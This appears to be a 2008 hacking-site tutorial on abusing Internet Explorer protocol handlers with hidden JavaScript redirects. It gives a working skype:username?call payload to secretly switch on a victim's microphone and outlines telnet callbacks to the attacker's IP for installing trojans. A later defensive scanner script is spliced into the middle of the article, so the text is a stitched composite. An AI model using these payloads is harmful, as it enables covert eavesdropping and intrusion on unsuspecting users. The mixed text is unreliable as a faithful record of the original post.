Hacking isn't just Computers & Exploits. It's a Philosophy. - Mr_Cheese
Wednesday, August 20, 2008
website security
What the IE exploit is, how to use it, how to hide it and what you can do. Examples. Script kiddies beware: this article is engineered only to give enough to be just that, script kiddies; the hardcore stuff you've got to learn yourself.

-=IE Exploit=-

Ok, this exploit isn't exactly the newest in the book, but it's still valid and hasn't been patched (thanks, Microsoft). Basically, this exploit allows us to remotely run programs on computers via a web page. So let's dig in.

We'll start with a bit of stuff you should know:

Open up IE and in the URL bar type "C:\". Wow, IE just turned into Windows Explorer (sort of). Isn't that interesting? Well, what if we could run other programs that way... what could we do? Think about any site you've been to that allows you to open an AIM window to someone. Ever looked at the hyperlink text? It looks something like this:

aim:goIm?screenname=tikprog&message=hello+world

Okay, let's break that up a bit. We've got three parts to this:
aim:
goIm?
screenname=tikprog&message=hello+world

Ok, the aim: part tells the browser what program to use. Various programs have this:
aim:
yahoo:
irc:
etc.

Next we have goIm? Look like PHP to anyone but me? Yeah... similar. It's the command. AIM has a lot of these:
goIm?
goAway?
and lots of others (google "aim:goIM?" and it should give you a nice list).

And finally, those of you who know PHP will know this already: the last bit is the parameters. That will send it to me with "hello world" in it. I'm not going to explain AIM scripting (if you can even call it that; google is your friend, or if you beg maybe I'll write a "scripting for various things" article).

Okay, to the important part here: the "aim:" part. Now, if AIM has this, and as I've said so do Yahoo and IRC, what else may have it? Well, I know for a fact a lot of things do... I'll give some examples later, but first I want you to learn a bit... because that is what being a hacker is about.

The reason this is good for IE and not other browsers (yay for Firefox!) is that IE doesn't prompt you for confirmation that you want to run this script; Firefox prompts you with a nice little box. Now, this becomes a dangerous exploit when you realize that some other programs that are more dangerous than AIM or IRC have this property. Let's say... oh... command, telnet, regedit. Now, for command and regedit I'm only going to show how to access them; using them is much more difficult and I'm not giving that up so a bunch of script kiddies can flood the net with destructive web pages. Those of you who actually figure it out, I'm hoping, are not going to kill the world. These pages can do A LOT of damage and I in no way advocate them for destruction, but there is a way (that I will show) to use them to gain some nice access and play some fun tricks.

With that being said... let's move on to the next topic. So now you have half a clue what's up with this exploit. If you've been paying attention you may be thinking to yourself "<insert preferred name here>, don't they have to click a hyperlink? Who's dumb enough to do that?" Thankfully, the Samurai has put 2 and 2 together (and gotten 5... read 1984, seriously) and made a nice little script to do that too. So, I'm not explaining how JScript works, just going to show you the code and give a brief explanation... if you don't know JScript... GO LEARN, DAMNIT. So here's my code:

<script>
window.location="aim:goIm?screenname=tikprog&message=hello+world";
</script>

So, what does this do? It redirects the page to that URL, which isn't a URL, just a nice little command. Embed this in a web page and no one will notice... no change is made... it just runs nicely.
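From the defender's side, the two things worth being able to do with pages like this are to split a "scheme:command?parameters" link into the three parts described above and to find scripts that silently redirect the page to a non-web scheme. The following is an added example (not code from the original article); it assumes a small set of schemes the browser handles itself and treats everything else as a protocol handler, and the sample page it scans is constructed for the example.

```javascript
// Added example (not from the original article): a small scanner that
// parses "scheme:command?params" links like the AIM one above and flags
// <script> blocks that redirect the page to a non-web protocol handler.

// Schemes a browser handles itself (assumed list); anything else is passed
// to whatever program is registered for it on the visitor's machine.
const WEB_SCHEMES = new Set(["http", "https", "ftp", "mailto"]);

// Split "aim:goIm?screenname=tikprog&message=hello+world" into its three
// parts: scheme ("aim"), command ("goIm") and parameters ({screenname, message}).
function parseSchemeLink(link) {
  const m = /^([a-z][a-z0-9+.-]*):([^?]*)(?:\?(.*))?$/i.exec(link.trim());
  if (m === null) return null;
  const [, scheme, command, query = ""] = m;
  const params = {};
  for (const pair of query.split("&")) {
    if (pair === "") continue;
    const eq = pair.indexOf("=");
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const value = eq === -1 ? "" : pair.slice(eq + 1);
    // "+" stands for a space in this style of query string ("hello+world")
    params[decodeURIComponent(key)] = decodeURIComponent(value.replace(/\+/g, " "));
  }
  return { scheme: scheme.toLowerCase(), command, params };
}

// Scan page markup for window.location / location.href assignments inside
// <script> blocks and return the ones whose target is a non-web scheme.
function findHandlerRedirects(html) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const assignRe = /(?:window\.)?location(?:\.href)?\s*=\s*(["'])(.*?)\1/g;
  let s;
  while ((s = scriptRe.exec(html)) !== null) {
    assignRe.lastIndex = 0;
    let a;
    while ((a = assignRe.exec(s[1])) !== null) {
      const parsed = parseSchemeLink(a[2]);
      if (parsed !== null && !WEB_SCHEMES.has(parsed.scheme)) {
        findings.push({ target: a[2], ...parsed });
      }
    }
  }
  return findings;
}

// Constructed sample page: one hidden redirect to a protocol handler and
// one ordinary web redirect that should not be reported.
const SAMPLE_HTML = `<html><body>
<p>Nothing to see here.</p>
<script>
window.location="aim:goIm?screenname=tikprog&message=hello+world";
</script>
<script>location.href = "https://example.com/";</script>
</body></html>`;

for (const f of findHandlerRedirects(SAMPLE_HTML)) {
  console.log(`handler redirect: scheme=${f.scheme} command=${f.command} target=${f.target}`);
}
```

Run on the sample page, only the aim: redirect is reported; the https: one is skipped because the browser handles it itself. The parser is the same three-way split the article walks through by hand, so it also handles the skype:username?call form used later, where the command and parameter positions are swapped.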

So... now you're thinking "...but Samurai, who cares about putting an AIM message script in?" And again, ye of little faith, I have some fun with this. I'll give you a few nice ones.

For snooping:
There is a nice little messaging program out there, Skype (www.skype.com; I would recommend it. It's encrypted, allows VoIP, has rocking emoticons (type "(finger)" for a hidden one), and just kicks AIM's butt); most important is VoIP. So, let's say you get your friend (or whoever you want to snoop on). Next go nab the source from a trusted site. I like google. And build a web page on it (make sure you change the picture source so they show up) and place it in something like Geocities with embedded code, and use AIM to hide the link by putting fake text (HTML works nicely too) with the URL.

Skype's command works like this:
skype:
and you put the parameter where the command went and the command where the parameter was... username?call.
so embed this code:

<script>
window.location="skype:username?call";
</script>

And then answer the call. If they have a mic it will turn on and you can listen in.

Now, as promised, the reason for this... intrusion!

Build a similar page and we're using our friend telnet. You're going to need my simple trojan article, or build a socket receiver in VB or whatever you want. Now, this only works if you can get a REAL IP address for yourself. If you're behind a router (or they are) it may not work. So we all know our friend telnet. So your code needs to open telnet to your IP address on the port you want. Telnet has a slightly different protocol to use here (think like command line); use that in the JScript code. I'm not giving you the whole thing... I want YOU to learn and to make sure not everyone does this.

So just think... using command, regedit, *nix you could open ports, run other apps, download trojans. And with a bit of creativity possibly gain some new access.

Enjoy.

© HellBound Hackers 2007- 2008. Since 3rd December 2004.